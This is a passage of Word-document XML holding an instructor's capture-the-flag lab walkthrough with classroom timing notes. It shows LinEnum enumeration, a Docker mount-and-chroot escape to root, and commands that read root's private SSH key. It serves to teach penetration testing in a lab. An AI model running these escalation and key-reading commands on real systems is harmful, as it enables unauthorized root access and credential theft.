      <w:r w:rsidRPr="007A67A4">
        <w:t>—&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0D776" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> +x LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C86A461" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="645D0743" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Important block point to make sure students can manage the “download a file to the target” shuffle-dance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC7000" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>linenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> runs, *Guide the students in reading the output, possible group collaboration point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91A7F7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t>10 mins, should be enough, then introduce Docker points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE55ACA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5BD8C9BA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>We find something interesting at the end here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFD650" w14:textId="1CF51B81" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33BD3BED" wp14:editId="1363DC97">
            <wp:extent cx="5704358" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12542629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07099" cy="2553927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D8A90" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="59098570" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>GTFO bin to escape from this shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50EC55" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">(found by referencing gtfo bins, identified because we’re doing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">-esc on a </w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>restricted</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> shell, and we have a lead related to a service, docker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04876022" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>docker run -v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> --rm -it bash chroot /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="587FB75D" w14:textId="587782FF" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DB0AF1D" wp14:editId="3E1576B3">
            <wp:extent cx="3381375" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="20022384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1375" cy="781050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA61C6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5A8D75F7" w14:textId="2A8DFB40" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Then they ask for the private ssh key as the final part of the challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF37199" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Navigate to where ssh key is stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959F7DD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="4B86A7BC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>cd /root/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDB7F5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE6F19E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D01C68" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDE8BBB" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17A38FDA" w14:textId="2FC92CB0" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E3AD854" wp14:editId="6AA3FA60">
            <wp:extent cx="3067050" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4782261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7050" cy="1552575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D26F0A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Answer is redacted, but send me a message if you’re stuck and sick of the gimmicks and just want to check this off the list. If you’re a student, now that you’ve read through this all, you’ve learned enough to warrant credit for the box’s completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFAD276" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="2068CE36" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>3h 16min total time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBBC32F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3E22F50B" w14:textId="41350858" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>! After the box is finished, make sure all students have a list of all commands and resources uses in truncated form, as a debrief of the box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F8D32" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>[end]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F626CA4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRDefault="007A67A4"/>
    <w:sectPr w:rsidR="007A67A4" w:rsidSect="007A67A4">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgNumType w:start="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44667"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F27E7646"/>
    <w:lvl w:ilvl="0" w:tplc="B01E1ADC">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7D1306"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAAC795A"/>
    <w:lvl w:ilvl="0" w:tplc="0616D7A2">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077E46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE3ED12C"/>
    <w:lvl w:ilvl="0" w:tplc="6E60CD5C">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426365">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="77404817">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1039817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7A4"/>
    <w:rsid w:val="007A67A4"/>
    <w:rsid w:val="00C94A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A2F16"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{93A29A11-7FD9-47A3-8391-509E92810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67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2404</Words>
  <Characters>13709</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>114</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16081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Summerlin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Summerlin</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-10T15:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-10T16:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>